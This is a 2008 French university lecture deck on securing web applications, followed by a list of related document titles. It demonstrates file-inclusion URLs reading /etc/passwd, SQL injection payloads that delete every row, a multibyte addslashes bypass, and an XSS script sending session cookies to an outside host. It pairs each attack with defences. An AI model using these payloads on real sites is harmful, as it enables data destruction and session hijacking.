La sécurisation d applications
|
|
- Florentin Blanchette
- il y a 8 ans
- Total affichages :
Transcription
1 Université Toulouse 1 Sciences Sociales 10 mars 2008
2 Les firewalls ne suffisent plus Mais ont-ils jamais été suffisants? La protection à 100% n existe pas. De plus certains protocoles doivent absolument passer : Le web (HTTP et HTTPS) Le courrier électronique (SMTP, POP3, IMAP) Les protocoles réseaux (DNS, ICMP, etc.)
3 Problème générique des failles Les failles sont dues à l utilisation imprévue d une variable pour obtenir un comportement inattendu, mais contrôlé, plus ou moins correctement, par le pirate. Contrairement à ce que montre le cinéma, les intrusions sont dûes à plus de 90% à l utilisation de failles de sécurité, et non à un problème de mot de passe. étant souvent les seuls points accessibles, voyons comment cela peut se passer.
4 HTTP HTML Apache Fonctionnement d un serveur web Un serveur web c est 2 choses Un procotole de communication : le HTTP Hyper Text Tranfert Protocol Actuellement en version 1.1 Un langage de description de page : le HTML Hyper Text Markup Language Actuellement en version 4.0.1
5 HTTP HTML Apache HTTP Il s agit d un protocole connecté, basé sur TCP, qui utilise habituellement le port 80 Il existe une version chiffrée (HTTPS) qui utilise le protocole SSL. Elle tourne sur le port 443. Ce protocole définit la manière de communiquer des pages des ordres donnés par le client (GET, POST, HEAD, PROPFIND, etc.) et ensuite récupère le résultat, précédé d un état (200, 404, 500 etc.)
6 HTTP HTML Apache HTTP Coupe la connexion, dès que le fichier est transféré (contrairement au ftp par exemple) Chaque nouveau fichier implique une nouvelle connexion Depuis la version 1.1, le serveur peut maintenir la liaison (keepalive) pour une durée déterminée.
7 HTTP HTML Apache HTML HTML est un dérivé de SGML Utilise des balise de définition Permet de décrire des pages web statiques. CGI (Common Gateway Interface) permet de créer dynamiquement des pages
8 HTTP HTML Apache HTML : exemple de CGI Voici un exemple en shell d un programme CGI #!/bin/sh echo Content-type : text/html echo echo <HTML> echo <BODY> echo <H1>Titre 1</H1> echo test de cgi echo </BODY> echo </HTML>
9 HTTP HTML Apache HTML : de nombreux langages Tous les langages peuvent être utilisés pour créer des CGI. Mais certains sont plus adaptés que d autres : Pour accélérer les traitements (le lancement d un interpréteur à chaque appel) certains langages sont présents sous forme de modules directement intégrés dans apache : PHP (dédié au web) ASP (uniquement pour Windows) Perl (langage système qui se révèle très efficace) Python Ruby (et particulièrement Ruby on rails, avec ses capacités web 2.0)
10 HTTP HTML Apache Apache : historique Il est dérivé du serveur NCSA, à l aide de patches d où son nom a patchy server. Il représente entre 60 et 70 % des serveurs web dans le monde. 3 versions coexistent la 1.3 : historique la 2.0 : plus efficace la 2.2 : avec une séparation des authentifications et des autorisations.
11 HTTP HTML Apache Apache : environnement Du fait de sa popularité, de très nombreux modules ont été développés pour lui : en authentification en sécurité (mod ssl, mod security) en fonctionnalité (mod proxy, mod cband, etc.) Il bénéficie aussi de très nombreux langages en modules PHP est le plus connu mais aussi mod perl, mod python, etc.
12 Structure d un service web
13 19 points de vulnérabilités Du schéma précédent, on peut trouver 19 points de vulnérabilités : Les logiciels Les serveurs Les scripts Les modules Les OS Les matériels Les communications L utilisateur Les protocoles
14 Les types de paramètres Variables GET. Elles sont données dans l URL de demande Variables POST. Fournies par un formulaire. Variables Cookies. Variables conservées par le navigateur sur son disque dur et généralement fournies par le serveur. Variables SERVER (HTTP USER AGENT ou HTTP REFERER)
15 Les variables GET Contexte Décrites dans l URL http :// Ici 2 variables p et hl, avec les valeurs html et fr. Généralement provenant d une interrogation directe Dans le cas présent, plutôt rare, il s agit d envoi par formulaire (method=get)
16 Les variables POST Contexte Remplies par un formulaire Utilisées quand on a un grand volume de données à envoyer Utilisées quand on a un grand nombre de variables Non tracées par les journaux des daemons (hormis modules spécifiques) Traitement particulier des variables Hidden qui sont cachées pour l utilisateur, mais pas pour le navigateur.
17 Les variables cookies Contexte Notion de valise de variables stockées sur le client Transmises de manière transparente dans la requête C est le serveur qui est sensé positionner ces variables pour une durée limitée Un serveur ne peut généralement (sauf faille de sécurité) demander à accéder qu aux variables : Qu il a lui-même positionnées Qu une machine de son domaine a positionnées (et si celle-ci l a autorise) Qu une machine d un domaine de confiance a positionnées (si celle-ci l a autorisé)
18 Les variables SERVER Contexte Ces variables sont hétéroclites. Celles que seul le serveur connait Version du serveur Répertoire de travail Celles qui sont associées à la connexion L adresse du client REMOTE ADDR L hôte appelé Le port source Celles qui proviennent du client Le Referer : HTTP REFERER Le USER AGENT L URL appelée
19 MUV : principe fondamental Ces variables proviennent quasiment toutes du client Il a donc tout pouvoir pour les modifier, effacer Les contrôles Javascript sont exécutés par le client ( s il le souhaite! ).
20 MUV : Quelques exemples Variables sur les noms de fichier (ou les répertoires) Variables dites superglobales Variables d exécution système Variables dans les requêtes SQL (ou LDAP, etc.) Variables pour du XSS
21 MUV : Sur les noms de fichiers Exemple d inclusion. Soit le programme de mise en page suivant <? include ( header.inc ) ; $page=$ GET[ page ] ; include ($page) ; include ( footer.inc ) ;?> Que l on utilise de la manière suivante Utilisation http :// /php/mep.php?page=toto.txt
22 MUV : Sur les noms de fichiers Quelques attaques : Exemples simples d utilisation malveillantes http :// /php/mep.php?page=/etc/passwd http :// /php/mep.php?page=http ://cri.univtlse1.fr/creufop/hacker.inc On pourrait de la même manière utiliser les fonctions fopen, require, etc.
23 MUV :Solution Contexte Enlever les caractères dangereux <? If (eregi( /,$page) {die( Va jouer dans le mixer! )} include ( header.inc ) ; include ($page) ; include ( footer.inc ) ;?> On peut aussi utiliser La notion de safe-mode : http ://fr2.php.net/features.safe-mode Empêcher l utilisateur apache de sortir (avec un firewall en sortie)
24 MUV : Code s appelant avec un login en paramètre <? if (($login == toto ) ( $login == anon )) {$acces=true ;} if ($acces) {echo vous avez accès à la page ;} else {echo vous n avez pas accès à la page ;}?> Que fait-on pour avoir accès à la page si on ne connaît pas les login toto et anon?
25 MUV : : solution Il ne faut pas autoriser la création de ces variables, si cela est possible (certaines vieilles applications le nécessitent. Dans le fichier /etc/httpd/conf/httpd.conf register global=off Dans les applications $login=$ get[ login ] ; $login=$ post[ login ] ; $login=$ cookie[ login ] ; $login=$ server[ login ] ;
26 MUV : Les injections SQL (ou LDAP) Le SQL est un langage d interrogation de base de données. C est un véritable langage de programmation, avec ses fonctions, ses variables, ses commentaires. Le principe des appels SQL en WWW, est que le langage (PHP par exemple) crée une chaine de caractères (la commande SQL) qui est ensuite envoyée au SGBD. Le SGBD interprète et exécute le programme envoyé.
27 MUV : Les injections SQL (ou LDAP) Petit programme appelé avec en paramètre id http :// /php/test.sql?id=3 Code du programme <? $sql query= DELETE FROM matable WHERE id=$id ; mysql connect($database) ; mysql query($database,$sql query) ;?>
28 MUV : Les injections SQL première attaque Les espaces doivent être remplacés par %20 http :// /php/test.sql?id=3 OR 1=1 ce qui nous donne Chaine envoyée au SGBD DELETE FROM matable WHERE id=3 OR 1=1 Le résultat est la destruction de tous les enregistrements.
29 MUV : Les injections SQL première solution La première solution peut consister à modifier le programme en ajoutant des quotes Code du programme $sql query= DELETE FROM matable WHERE id= $id ; Le résultat de la première attaque devient alors Code du programme DELETE FROM matable WHERE id= 3 OR 1=1 qui est sans danger. Mais pourtant une faille existe encore
30 MUV : Les injections SQL deuxième attaque Insérons une quote http :// /php/test.sql?id=3 OR 1=1 ce qui nous donne Chaine envoyée au SGBD DELETE FROM matable WHERE id= 3 OR 1=1 Le résultat est encore la destruction de tous les enregistrements.
31 MUV : Les injections SQL deuxième solution La solution va passer par 2 possibilités le magic quotes gpc à on (par défaut depuis la pour PHP, mais il est désactivé dans PHP5, et disparait en PHP6) la fonction addslashes Code du programme $id=add slashes($id) ; $sql query= DELETE FROM matable WHERE id= $id ; L attaque précédente donne alors Chaine envoyée au SGBD DELETE FROM matable WHERE id= 3\ OR 1=1 Qui ne fait plus rien. Mais ce n est toujours pas fini. Une faille existe malgré cela.
32 MUV : Les injections SQL troisième attaque Le but de magic quotes gpc est à ON. Mais il a des problèmes avec les caractères dits multibytes : c est à dire les alphabets plus complexes (chinois par exemple) A la place de la quote, plaçons le caractère multibyte 0xbf27. Cela ne peut réellement se faire que par un script : Parlons chinois $id=chr(0xbf).chr(0x27). OR 1=1 ; fopen(http :// /php/test.sql?id=$id) ;
33 MUV : Les injections SQL troisième attaque Le PHP reçoit un caractère chinois 0xbf27 (d ailleurs valide), et le comprend comme tel. Il l envoie à addslashes (ou à magic quotes gpc, ce qui est identique) Celui-ci ne comprenant pas que c est un caractère multibytes, croit voir 2 caractères : 0xbf et 0x27 qui est une quote. Il ajoute à 0x27 un antislash (0x5c). La chaine renvoyée à PHP est donc 0xbf5c27. Comme PHP comprend le multibyte, et que 0xbf5c est un caractère valide, il nous reste 0x27 qui est... la quote.
34 MUV : Les injections SQL troisième attaque On obtient alors la chaine suivante où? représente le caractère 0xbf5c : Chaine envoyée au SGBD DELETE FROM matable WHERE id= 3? OR 1=1 Le résultat est encore la destruction de tous les enregistrements. Solution : mysql real escape string().
35 MUV : Les variables de session Les variables de session permettent de mettre les variables habituellement mises en cookies, uniquement sur le serveur Cela évite de trimballer beaucoup d information On n a plus à les contrôler à chaque fois (elles ne sont plus modifiables) Seule reste une variable dans le cookie : celle qui contient le numéro de session. En général, cette variable est équivalente à un identifiant (on ne réauthentifie plus la personne). Pour un pirate, c est LE cookie à obtenir.
36 MUV : Voler un cookie : Attaque Soit un forum avec une zone de texte quelconque. Si on saisit Salut les potes, le cours est génial, le prof est <B>super</B>. Reviendez... On obtient donc Salut les potes, le cours est génial, le prof est super. Reviendez...
37 MUV : Voler un cookie : Problème Et si on saisit? <script> while (1) alert( Vas téter la prise électrique ) ; </script>
38 MUV : Voler un cookie : Problème Soyons plus méchant : Récupérons le cookie <script> cookie=document.cookie() ; i=new image() ; i.src= http :// +cookie ; </script>
39 MUV : Voler un cookie : Solution Bloquer la chaine <script dans les messages.
40 MUV : Voler un cookie : Vraiment la solution? Comment s écrit script???? <script <javascript <JAVAscript <java script <java script etc.
Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin
Sécurité des sites Web Pas un cours un recueil du net INF340 Jean-François Berdjugin Vulnérabilité Définition (wikipédia) : Dans le domaine de la sécurité informatique, une vulnérabilité est une faiblesse
Plus en détailL3 informatique TP n o 2 : Les applications réseau
L3 informatique TP n o 2 : Les applications réseau Sovanna Tan Septembre 2009 1/20 Sovanna Tan L3 informatique TP n o 2 : Les applications réseau Plan 1 Transfert de fichiers 2 Le Courrier électronique
Plus en détailVulnérabilités et sécurisation des applications Web
OSSIR 09/09/2002 Vulnérabilités, attaques et sécurisation des applications Web Pourquoi les firewalls sont impuissants patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Page 1 Planning
Plus en détailHébergement de site web Damien Nouvel
Hébergement de site web Plan L'hébergeur Le serveur web Apache Sites dynamiques 2 / 27 Plan L'hébergeur Le serveur web Apache Sites dynamiques 3 / 27 L'hébergeur L'hébergeur sous-traite l'architecture
Plus en détailProtection des protocoles www.ofppt.info
ROYAUME DU MAROC Office de la Formation Professionnelle et de la Promotion du Travail Protection des protocoles DIRECTION RECHERCHE ET INGENIERIE DE FORMATION SECTEUR NTIC Sommaire 1. Introduction... 2
Plus en détailUn exemple d'authentification sécurisée utilisant les outils du Web : CAS. P-F. Bonnefoi
Un exemple d'authentification sécurisée utilisant les outils du Web : CAS 111 L authentification CAS : «Central Authentication Service» CAS ou le service central d authentification Le système CAS, développé
Plus en détailProgrammation Internet Cours 4
Programmation Internet Cours 4 Kim Nguy ên http://www.lri.fr/~kn 17 octobre 2011 1 / 23 Plan 1. Système d exploitation 2. Réseau et Internet 3. Web 3.1 Internet et ses services 3.1 Fonctionnement du Web
Plus en détailINTERNET est un RESEAU D ORDINATEURS RELIES ENTRE EUX A L ECHELLE PLANETAIRE. Internet : interconnexion de réseaux (anglais : net = réseau)
CS WEB Ch 1 Introduction I. INTRODUCTION... 1 A. INTERNET INTERCONNEXION DE RESEAUX... 1 B. LE «WEB» LA TOILE, INTERCONNEXION DE SITES WEB... 2 C. L URL : LOCALISER DES RESSOURCES SUR L INTERNET... 2 D.
Plus en détailcedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007
A t t a q u e s c o n t r e l e s a p p l i s w e b cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007 D e l ' u t i l i t é d e l ' a t t a
Plus en détailPrincipales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement
Guillaume HARRY l Contenu sous licence Creative Commons CC-BY-NC-ND Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement P. 2 1. Introduction 2.
Plus en détailVulnérabilités et solutions de sécurisation des applications Web
Vulnérabilités et solutions de sécurisation des applications Web Patrick CHAMBET EdelWeb ON-X Consulting patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Eric Larcher RSSI Accor
Plus en détailLes sites Internet dynamiques. contact : Patrick VINCENT pvincent@erasme.org
Les sites Internet dynamiques contact : Patrick VINCENT pvincent@erasme.org Qu est-ce qu un site Web? ensemble de pages multimédia (texte, images, son, vidéo, ) organisées autour d une page d accueil et
Plus en détailProgrammation Web. Madalina Croitoru IUT Montpellier
Programmation Web Madalina Croitoru IUT Montpellier Organisation du cours 4 semaines 4 ½ h / semaine: 2heures cours 3 ½ heures TP Notation: continue interrogation cours + rendu à la fin de chaque séance
Plus en détailExpérience d un hébergeur public dans la sécurisation des sites Web, CCK. Hinda Feriani Ghariani Samedi 2 avril 2005 Hammamet
Expérience d un hébergeur public dans la sécurisation des sites Web, CCK Hinda Feriani Ghariani Samedi 2 avril 2005 Hammamet Plan Introduction Sécurisation des sites Web hébergés a Conclusion Introduction
Plus en détailArchitectures web/bases de données
Architectures web/bases de données I - Page web simple : HTML statique Le code HTML est le langage de base pour concevoir des pages destinées à être publiées sur le réseau Internet ou intranet. Ce n'est
Plus en détailModule BD et sites WEB
Module BD et sites WEB Cours 8 Bases de données et Web Anne Doucet Anne.Doucet@lip6.fr 1 Le Web Architecture Architectures Web Client/serveur 3-tiers Serveurs d applications Web et BD Couplage HTML-BD
Plus en détailLe serveur HTTPd WASD. Jean-François Piéronne
Le serveur HTTPd WASD Jean-François Piéronne Sommaire Caractéristiques Architecture générale Performances Intégration dans OpenVMS Caractéristiques Implémentation complète HTTP/1.0 Méthodes "GET", "HEAD",
Plus en détailAttaques applicatives
Attaques applicatives Attaques applicatives Exploitation d une mauvaise programmation des applications Ne touche pas le serveur lui-même mais son utilisation/ configuration Surtout populaire pour les sites
Plus en détailServeurs de noms Protocoles HTTP et FTP
Nils Schaefer Théorie des réseaux (EC3a) Serveurs de noms Protocoles HTTP et FTP Théorie des réseaux (EC3a) Séance 7 Pourquoi DNS? Internet est une structure hiérarchique et arborescente de réseaux et
Plus en détailInstallation d un serveur HTTP (Hypertext Transfer Protocol) sous Débian 6
Installation d un serveur HTTP (Hypertext Transfer Protocol) sous Débian 6 1 BERNIER François http://astronomie-astrophotographie.fr Table des matières Installation d un serveur HTTP (Hypertext Transfer
Plus en détailINFORMATIQUE & WEB. PARCOURS CERTIFICAT PROFESSIONNEL Programmation de sites Web. 1 an 7 MODULES. Code du diplôme : CP09
INFORMATIQUE & WEB Code du diplôme : CP09 Passionné par l informatique et le web, vous souhaitez obtenir une certification dans un domaine porteur et enrichir votre CV? PARCOURS CERTIFICAT PROFESSIONNEL
Plus en détailSécurité des réseaux Les attaques
Sécurité des réseaux Les attaques A. Guermouche A. Guermouche Cours 2 : Les attaques 1 Plan 1. Les attaques? 2. Quelques cas concrets DNS : Failles & dangers 3. honeypot A. Guermouche Cours 2 : Les attaques
Plus en détailPratique et administration des systèmes
Université Louis Pasteur Licence Informatique (L2) UFR de Mathématiques et Informatique Année 2007/2008 1 But du TP Pratique et administration des systèmes TP10 : Technologie LAMP Le but de ce TP est de
Plus en détailFailles XSS : Principes, Catégories Démonstrations, Contre mesures
HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Séminaire 15 ans HSC Failles XSS : Principes, Catégories Démonstrations,
Plus en détailActivité sur Meteor. Annexe 1 : notion de client-serveur et notion de base de données
Activité sur Meteor Annexe 1 : notion de client-serveur et notion de base de données Notion de client-serveur Que se passe-t-il lorsque vous tapez dans la barre d'adresse de votre navigateur «http://www.google.fr»?
Plus en détailPHP CLÉS EN MAIN. 76 scripts efficaces pour enrichir vos sites web. par William Steinmetz et Brian Ward
PHP CLÉS EN MAIN 76 scripts efficaces pour enrichir vos sites web par William Steinmetz et Brian Ward TABLE DES MATIÈRES INTRODUCTION 1 1 TOUT CE QUE VOUS AVEZ TOUJOURS VOULU SAVOIR SUR LES SCRIPTS PHP
Plus en détailSingle Sign-On open source avec CAS (Central Authentication Service) Vincent Mathieu Pascal Aubry Julien Marchal
Single Sign-On open source avec CAS (Central Authentication Service) Vincent Mathieu Pascal Aubry Julien Marchal SSO open source avec CAS Introduction Pourquoi le Single Sign-On? Principes du SSO sur le
Plus en détailRemote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4)
Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4) Sommaire : Contenu I. Introduction:... 2 II. Présentation de l atelier :... 2 1) Attaque persistante :... 3 2) Attaque non persistante :...
Plus en détailwebmestre : conception de sites et administration de serveurs web 42 crédits Certificat professionnel CP09
AISL - Architecture et Intégration des Systèmes Logiciels - 2011-2012 webmestre : conception de sites et administration de serveurs web 42 crédits Certificat professionnel CP09 Administrer un serveur et
Plus en détailMysql. Les requêtes préparées Prepared statements
Mysql Les requêtes préparées Prepared statements Introduction Les prepared statements côté serveur sont une des nouvelles fonctionnalités les plus intéressantes de MySQL 4.1 (récemment sorti en production
Plus en détailStockage du fichier dans une table mysql:
Stockage de fichiers dans des tables MYSQL avec PHP Rédacteur: Alain Messin CNRS UMS 2202 Admin06 30/06/2006 Le but de ce document est de donner les principes de manipulation de fichiers dans une table
Plus en détailHTTP HTTP. IUT1 dpt SRC L Isle d Abeau Jean-françois Berdjugin. Introduction et architecture Messages Authentification Conclusion
HTTP IUT1 dpt SRC L Isle d Abeau Jean-françois Berdjugin HTTP Introduction et architecture Messages Authentification Conclusion 1 HTTP Introduction et architecture Hypertext Transfert Protocol URI (Uniform
Plus en détailProxy et reverse proxy. Serveurs mandataires et relais inverses
Serveurs mandataires et relais inverses Qu'est-ce qu'un proxy? Proxy = mandataire (traduction) Un proxy est un service mandataire pour une application donnée. C'est à dire qu'il sert d'intermédiaire dans
Plus en détailSécurité des applications web. Daniel Boteanu
I F8420: Éléments de Sécurité des applications web Daniel Boteanu Architecture des applications web Client légitime Internet HTTP 浀 HTML Server Web 2 Architecture des applications web Client légitime Internet
Plus en détailHébergement de sites Web
Hébergement de Solutions complètes et évolutives pour l hébergement de sites Web dynamiques et de services Web sécurisés. Fonctionnalités Serveur Web Apache hautes performances Apache 1. et.0 1 avec prise
Plus en détailWebSSO, synchronisation et contrôle des accès via LDAP
31 mars, 1er et 2 avril 2009 WebSSO, synchronisation et contrôle des accès via LDAP Clément Oudot Thomas Chemineau Sommaire général Synchronisation d'identités WebSSO et contrôle des accès Démonstration
Plus en détailCréation d un «Web Worm»
Création d un «Web Worm» Exploitation automatisée des failles web Simon Marechal Thales Security Systems Consultant Risk Management 1 Création d un ver exploitant une faille web 1.1 Introduction Les applications
Plus en détail(structure des entêtes)
Aide mémoire HTTP (structure des entêtes) Fabrice HARROUET École Nationale d Ingénieurs de Brest http://www.enib.fr/~harrouet/ enib 1/10 Structure générale d une requête Requête HTTP méthode ressource
Plus en détailMac OS X Server Administration des technologies Web. Pour la version 10.3 ou ultérieure
Mac OS X Server Administration des technologies Web Pour la version 10.3 ou ultérieure appleapple Computer Inc. 2003 Apple Computer, Inc. Tous droits réservés. Le propriétaire ou l utilisateur autorisé
Plus en détailles techniques d'extraction, les formulaires et intégration dans un site WEB
les techniques d'extraction, les formulaires et intégration dans un site WEB Edyta Bellouni MSHS-T, UMS838 Plan L extraction des données pour un site en ligne Architecture et techniques Les différents
Plus en détailFirewall IDS Architecture. Assurer le contrôle des connexions au. nicolas.hernandez@univ-nantes.fr Sécurité 1
Sécurité Firewall IDS Architecture sécurisée d un réseau Assurer le contrôle des connexions au réseau nicolas.hernandez@univ-nantes.fr Sécurité 1 Sommaire général Mise en oeuvre d une politique de sécurité
Plus en détailWEB APPLICATION FIREWALL AVEC APACHE ET MOD_SECURITY
WEB APPLICATION FIREWALL AVEC APACHE ET MOD_SECURITY version 1.00 Objectifs Cette fiche pratique permet d atteindre deux objectifs distincts et potentiellement complémentaires. Configuration d Apache en
Plus en détailInternet. DNS World Wide Web. Divers. Mécanismes de base Exécution d'applications sur le web. Proxy, fire-wall
Internet DNS World Wide Web Mécanismes de base Exécution d'applications sur le web Divers Proxy, fire-wall 1 Les services usuels de l Internet Services principaux (applications) disponibles sur l Internet
Plus en détailLINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation
Objectif : Tout administrateur système et réseau souhaitant avoir une vision d'ensemble des problèmes de sécurité informatique et des solutions existantes dans l'environnement Linux. Prérequis : Connaissance
Plus en détailCours CCNA 1. Exercices
Cours CCNA 1 TD3 Exercices Exercice 1 Enumérez les sept étapes du processus consistant à convertir les communications de l utilisateur en données. 1. L utilisateur entre les données via une interface matérielle.
Plus en détailCisco Certified Network Associate
Cisco Certified Network Associate Version 4 Notions de base sur les réseaux Chapitre 3 01 Quel protocole de la couche application sert couramment à prendre en charge les transferts de fichiers entre un
Plus en détailHTTP. Technologies du Web. Programmation Web côté serveur. Mastère spécialisé Management et nouvelles technologies, 16 novembre 2009
HTTP Technologies du Web Programmation Web côté serveur Pierre Senellart (pierre.senellart@telecom-paristech.fr) Mastère spécialisé Management et nouvelles technologies, 16 novembre 2009 P. Senellart (TELECOM
Plus en détailDans l'épisode précédent
Dans l'épisode précédent 2 Le réseau SERVEURS POSTE CLIENT POSTE CLIENT wifi SERVEURS POSTE CLIENT switch Borne Wifi SERVEURS routeur POSTE CLIENT? SERVEURS SERVEURS SERVEURS POSTE CLIENT SERVEURS 3 Les
Plus en détailLa mémorisation des mots de passe dans les navigateurs web modernes
1 La mémorisation des mots de passe dans les navigateurs web modernes Didier Chassignol Frédéric Giquel 6 décembre 2005 - Congrès JRES 2 La problématique Multiplication des applications web nécessitant
Plus en détailPrésentation de la solution Open Source «Vulture» Version 2.0
Présentation de la solution Open Source «Vulture» Version 2.0 Advens IST Day 15 septembre 2011 http://www.vultureproject.org 1 s/apache/mod_perl/ LE PROJET VULTURE Advens IST Day 15 septembre 2011 http://www.vultureproject.org
Plus en détailOWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI
OWASP Open Web Application Security Project Jean-Marc Robert Génie logiciel et des TI A1: Injection Une faille d'injection, telle l'injection SQL, OS et LDAP, se produit quand une donnée non fiable est
Plus en détailGlossaire. www.themanualpage.org ( themanualpage.org) soumises à la licence GNU FDL.
Glossaire Ce glossaire contient les termes techniques et de spécialité les plus employés dans cette thèse. Il emprunte, pour certaines d entre elles, les définitions proposées par www.themanualpage.org
Plus en détailRéseaux et protocoles Damien Nouvel
Réseaux et protocoles Plan Les couches du réseau Suite de protocoles TCP/IP Protocoles applicatifs pour les sites web Requêtes HTTP 2 / 35 Plan Les couches du réseau Suite de protocoles TCP/IP Protocoles
Plus en détailTech-Evenings Sécurité des applications Web Sébastien LEBRETON
Tech-Evenings Sécurité des applications Web Sébastien LEBRETON Pourquoi revoir la sécurité des applications Web Des technologies omniprésentes Facilité de mise en œuvre et de déploiement. Commerce en ligne,
Plus en détailPrésentation du relais HTTP Open Source Vulture. Arnaud Desmons <ads@intrinsec.com> Jérémie Jourdin <jjn@intrinsec.com>
Arnaud Desmons Jérémie Jourdin Présentation Motivations Historique Démonstration Présentation fonctionnelle Présentation technique L'interface d'administration Roadmap
Plus en détailL identité numérique. Risques, protection
L identité numérique Risques, protection Plan Communication sur l Internet Identités Traces Protection des informations Communication numérique Messages Chaque caractère d un message «texte» est codé sur
Plus en détailLinux. Sécuriser un réseau. 3 e édition. l Admin. Cahiers. Bernard Boutherin Benoit Delaunay. Collection dirigée par Nat Makarévitch
Bernard Boutherin Benoit Delaunay Cahiers de l Admin Linux Sécuriser un réseau 3 e édition Collection dirigée par Nat Makarévitch Groupe Eyrolles, 2003, 2004, 2007, ISBN : 2-212-11960-7, ISBN 13 : 978-2-212-11960-2
Plus en détailPrésentation du logiciel Free-EOS Server
Présentation du logiciel Free-EOS Server Ce document décrit la solution logicielle de serveur intranet/internet/extranet développée dans le projet free-eos. 1. Distribution serveur free-eos Server Le logiciel
Plus en détailEtude de la pertinence et de l'intérêt des appliances WAF (IPS web) à l'inria
Etude de la pertinence et de l'intérêt des appliances WAF (IPS web) à l'inria 1 Philippe Lecler TutoJRES «Sécurité des sites WEB» 4 février 2010 Contexte 2 PCI-DSS : Payment Card Industry Data Security
Plus en détailIntroduction. PHP = Personal Home Pages ou PHP Hypertext Preprocessor. Langage de script interprété (non compilé)
Introduction PHP = Personal Home Pages ou PHP Hypertext Preprocessor Langage de script interprété (non compilé) Plan Avantages Fonctionnement interne Bases du langage Formulaires Envoi d un email Avantages
Plus en détailProgrammation Web. Introduction
Programmation Web Introduction 1 Introduction 10 séances 1 h cours + 1h TD Notes : contrôle continu DS 1 TP : note de groupe : rapport + code source + démo TD : note personnelle (=0 si 2 absences non justifiées)
Plus en détailAdresse directe fichier : Adresse url spécifique sur laquelle le lien hypertext du Client doit être
GLOSSAIRE Adresse directe fichier : Adresse url spécifique sur laquelle le lien hypertext du Client doit être redirigé pour permettre l activation du Service. Adresse IP : Numéro qui identifie chaque équipement
Plus en détailLa Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet
REALSENTRY TM Gestion, Performance et Sécurité des infrastructures Web La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet L authentification
Plus en détailINTRODUCTION A JAVA. Fichier en langage machine Exécutable
INTRODUCTION A JAVA JAVA est un langage orienté-objet pur. Il ressemble beaucoup à C++ au niveau de la syntaxe. En revanche, ces deux langages sont très différents dans leur structure (organisation du
Plus en détailModule Com231A - Web et Bases de Données Notion 5 : Formulaires et utilisation des Bases de Données avec PHP
Module Com231A - Web et Bases de Données Notion 5 : Formulaires et utilisation des Bases de Données avec PHP Au cours de ce TP, vous allez voir comment PHP permet aux utilisateurs, une interaction avec
Plus en détailMise en place d un serveur Proxy sous Ubuntu / Debian
BTS INFORMATIQUE DE GESTION Option Administrateur Réseaux Benoît VERRON Activité n 1 Mise en place d un serveur Proxy sous Ubuntu / Debian Présentation d un Proxy Un proxy (serveur mandataire) est un serveur
Plus en détailTechnologies du Web. Créer et héberger un site Web. Pierre Senellart. Page 1 / 26 Licence de droits d usage
Technologies du Web Créer et héberger un site Web Page 1 / 26 Plan Planification Choisir une solution d hébergement Administration Développement du site Page 2 / 26 Cahier des charges Objectifs du site
Plus en détailDéveloppement des Systèmes d Information
Développement des Systèmes d Information Axe ISI Camille Persson Institut Fayol / LSTI / ISCOD École Nationale Supérieure des Mines de Saint-Etienne 158 cours Fauriel, 42000 Saint-Etienne persson@emse.fr
Plus en détailServices Réseaux - Couche Application. TODARO Cédric
Services Réseaux - Couche Application TODARO Cédric 1 TABLE DES MATIÈRES Table des matières 1 Protocoles de gestion de réseaux 3 1.1 DHCP (port 67/68)....................................... 3 1.2 DNS (port
Plus en détailLes solutions de paiement CyberMUT (Crédit Mutuel) et P@iement CIC. Qui contacter pour commencer la mise en place d une configuration de test?
Les solutions de paiement CyberMUT (Crédit Mutuel) et P@iement CIC Qui contacter pour commencer la mise en place d une configuration de test? CyberMUT Paiement - Paiement CIC Commerce Electronique mailto:centrecom@e-i.com
Plus en détailConfiguration du nouveau Bureau Virtuel (BV) collaboratif de Lyon I
Configuration du nouveau Bureau Virtuel (BV) collaboratif de Lyon I Date : 13 octobre 2009 / Auteur : David ROMEUF / Version : 1.1 / Diffusion : Utilisateurs Table des matières Cas 1 : un poste MS-Windows
Plus en détailMise en œuvre des serveurs d application
Nancy-Université Mise en œuvre des serveurs d application UE 203d Master 1 IST-IE Printemps 2008 Master 1 IST-IE : Mise en œuvre des serveurs d application 1/54 Ces transparents, ainsi que les énoncés
Plus en détailDéveloppement d applications Internet et réseaux avec LabVIEW. Alexandre STANURSKI National Instruments France
Développement d applications Internet et réseaux avec LabVIEW Alexandre STANURSKI National Instruments France Quelles sont les possibilités? Publication de données Génération de rapports et de documents
Plus en détailHébergement WeboCube. Un système performant et sécurisé. Hébergement géré par une équipe de techniciens
Hébergement WeboCube Le service d'hébergement WeboCube a pour but de sécuriser la présence internet grâce à un suivi personnalisé et une maintenance active de votre serveur internet. Un espace de gestion
Plus en détailAttaques de type. Brandon Petty
Attaques de type injection HTML Brandon Petty Article publié dans le numéro 1/2004 du magazine Hakin9 Tous droits reservés. La copie et la diffusion de l'article sont admises à condition de garder sa forme
Plus en détailApplication Web et J2EE
Application Web et J2EE Servlet, JSP, Persistence, Méthodologie Pierre Gambarotto Département Informatique et Math appli ENSEEIHT Plan Introduction 1 Introduction Objectfis
Plus en détailSERVEUR WEB LINUX LAMP. Raymond RAZAFIMAMONJY Administration LINUX / UNIX Chapitre 15 www.razafimamonjy.fr
SERVEUR WEB LINUX LAMP 1 Le Serveur APACHE Définition d un serveur web : - Un serveur http ou démon http ou HTTPd (HTTP daemon) ou (moins précisément) serveur web, est un logiciel servant des requêtes
Plus en détailTIC. Réseau informatique. Historique - 1. Historique - 2. TC - IUT Montpellier Internet et le Web
